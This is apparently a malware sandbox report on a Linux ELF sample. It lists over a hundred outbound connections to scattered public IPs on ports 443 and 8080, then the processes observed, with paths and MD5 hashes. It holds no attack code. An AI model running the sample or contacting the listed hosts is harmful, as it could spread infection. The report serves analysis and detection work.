                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21537192.168.2.133319650.126.216.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21538192.168.2.1333408143.213.61.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21539192.168.2.1358254107.58.152.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21540192.168.2.1341744138.171.102.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21541192.168.2.1336862105.91.20.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21542192.168.2.133983444.234.22.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21543192.168.2.1355644196.53.123.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21544192.168.2.1356384106.21.72.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21545192.168.2.1354556182.19.207.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21546192.168.2.1333940196.211.212.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21547192.168.2.1333802103.185.108.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21548192.168.2.133980890.163.169.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21549192.168.2.133803858.173.29.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21550192.168.2.1344912201.32.17.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21551192.168.2.1360354106.235.186.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21552192.168.2.1358546156.243.173.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21553192.168.2.1337916137.253.184.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21554192.168.2.136006219.134.70.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21555192.168.2.1344712149.178.111.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21556192.168.2.1359000118.200.164.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21557192.168.2.135257085.10.210.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21558192.168.2.1345686109.117.72.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21559192.168.2.136072093.149.243.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21560192.168.2.134082227.56.217.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21561192.168.2.1341228152.38.198.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21562192.168.2.1343646105.103.76.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21563192.168.2.1358640172.45.103.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21564192.168.2.133383643.213.197.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21565192.168.2.1350406138.105.61.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21566192.168.2.1338504181.72.231.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21567192.168.2.1348080136.234.57.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21568192.168.2.134336642.228.132.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21569192.168.2.133751645.224.111.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21570192.168.2.1351796207.15.218.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21571192.168.2.133409858.214.112.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21572192.168.2.1339588184.156.79.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21573192.168.2.135259658.94.207.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21574192.168.2.1358012142.100.37.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21575192.168.2.134444271.42.168.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21576192.168.2.1351296153.28.101.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21577192.168.2.1334572191.203.94.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21578192.168.2.1340624119.49.75.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21579192.168.2.1349746136.41.139.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21580192.168.2.134215812.3.19.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21581192.168.2.1342796126.47.125.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21582192.168.2.1348630112.65.250.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21583192.168.2.1357786115.254.74.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21584192.168.2.1343950121.17.203.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21585192.168.2.1339876130.227.219.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21586192.168.2.1343098199.219.165.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21587192.168.2.135026850.118.243.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21588192.168.2.134927087.26.75.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21589192.168.2.134337489.82.27.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21590192.168.2.1349916180.79.131.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21591192.168.2.1338064201.249.129.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21592192.168.2.134607093.58.163.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21593192.168.2.1359930222.170.232.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21594192.168.2.135473848.88.40.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21595192.168.2.1339838191.50.133.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21596192.168.2.1340666193.138.230.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21597192.168.2.136036019.142.115.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21598192.168.2.1335396111.97.30.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21599192.168.2.134794651.230.97.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21600192.168.2.134245075.0.26.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21601192.168.2.1352806188.51.156.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21602192.168.2.134443861.34.103.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21603192.168.2.134972036.164.133.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21604192.168.2.1351738176.117.200.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21605192.168.2.1351160203.189.97.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21606192.168.2.1355228142.234.34.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21607192.168.2.1335062151.237.78.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21608192.168.2.1347968112.149.95.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21609192.168.2.133511687.58.45.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21610192.168.2.135456692.214.66.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21611192.168.2.134172678.221.196.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21612192.168.2.1360168189.236.3.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21613192.168.2.135186636.0.97.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21614192.168.2.1348770128.28.220.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21615192.168.2.133327284.120.219.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21616192.168.2.1340000126.237.89.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21617192.168.2.1333478187.223.28.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21618192.168.2.13607104.63.31.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21619192.168.2.1350654146.109.25.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21620192.168.2.1335804197.160.232.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21621192.168.2.13597982.11.237.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21622192.168.2.133300237.216.138.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21623192.168.2.1358486130.81.166.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21624192.168.2.134488214.1.126.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21625192.168.2.1338244194.173.248.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21626192.168.2.134239081.163.105.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21627192.168.2.1341670150.163.3.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21628192.168.2.135675693.71.154.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21629192.168.2.1348594116.162.243.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21630192.168.2.1332992135.205.23.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21631192.168.2.133915095.167.11.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21632192.168.2.1355122150.2.154.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21633192.168.2.1338818161.41.46.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21634192.168.2.135880861.65.162.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21635192.168.2.1359836202.153.134.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21636192.168.2.1359590137.170.104.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21637192.168.2.136031887.149.19.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21638192.168.2.1336774131.211.224.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21639192.168.2.133657620.156.57.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21640192.168.2.1349562101.88.62.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21641192.168.2.135072837.28.242.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21642192.168.2.1339002206.121.119.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21643192.168.2.134861470.157.28.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21644192.168.2.1353762221.195.229.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21645192.168.2.1341358188.236.84.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21646192.168.2.1343014170.44.59.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21647192.168.2.135995470.115.75.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21648192.168.2.1360470184.170.220.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21649192.168.2.135855652.96.172.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21650192.168.2.135973049.190.200.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21651192.168.2.1335222166.216.157.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21652192.168.2.1343122158.68.1.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21653192.168.2.136039848.235.70.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21654192.168.2.134645880.58.220.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21655192.168.2.134203493.252.213.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21656192.168.2.1352188175.253.246.88080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21657192.168.2.134534452.128.38.698080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21658192.168.2.1338570191.61.190.2528080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21659192.168.2.1345452115.5.64.1688080
                                                  TimestampBytes transferredDirectionData


                                                  System Behavior

                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:/tmp/pBVFNv9jh6.elf
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                                                  Start time (UTC):17:23:00
                                                  Start date (UTC):19/01/2024
                                                  Path:/tmp/pBVFNv9jh6.elf
                                                  Arguments:-
                                                  File size:4139976 bytes
                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                                                  Start time (UTC):17:23:02
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/libexec/gnome-session-binary
                                                  Arguments:-
                                                  File size:334664 bytes
                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                  Start time (UTC):17:23:02
                                                  Start date (UTC):19/01/2024
                                                  Path:/bin/sh
                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):17:23:02
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/libexec/gsd-print-notifications
                                                  Arguments:/usr/libexec/gsd-print-notifications
                                                  File size:51840 bytes
                                                  MD5 hash:71539698aa691718cee775d6b9450ae2

                                                  Start time (UTC):17:23:03
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/libexec/gsd-print-notifications
                                                  Arguments:-
                                                  File size:51840 bytes
                                                  MD5 hash:71539698aa691718cee775d6b9450ae2

                                                  Start time (UTC):17:23:03
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/libexec/gsd-print-notifications
                                                  Arguments:-
                                                  File size:51840 bytes
                                                  MD5 hash:71539698aa691718cee775d6b9450ae2

                                                  Start time (UTC):17:23:04
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/libexec/gsd-printer
                                                  Arguments:/usr/libexec/gsd-printer
                                                  File size:31120 bytes
                                                  MD5 hash:7995828cf98c315fd55f2ffb3b22384d

                                                  Start time (UTC):17:23:04
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/sbin/gdm3
                                                  Arguments:-
                                                  File size:453296 bytes
                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                  Start time (UTC):17:23:04
                                                  Start date (UTC):19/01/2024
                                                  Path:/etc/gdm3/PrimeOff/Default
                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):17:23:05
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/sbin/gdm3
                                                  Arguments:-
                                                  File size:453296 bytes
                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                  Start time (UTC):17:23:05
                                                  Start date (UTC):19/01/2024
                                                  Path:/etc/gdm3/PrimeOff/Default
                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):17:23:15
                                                  Start date (UTC):19/01/2024
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:-
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time (UTC):17:23:15
                                                  Start date (UTC):19/01/2024
                                                  Path:/lib/systemd/systemd-user-runtime-dir
                                                  Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                                  File size:22672 bytes
                                                  MD5 hash:d55f4b0847f88131dbcfb07435178e54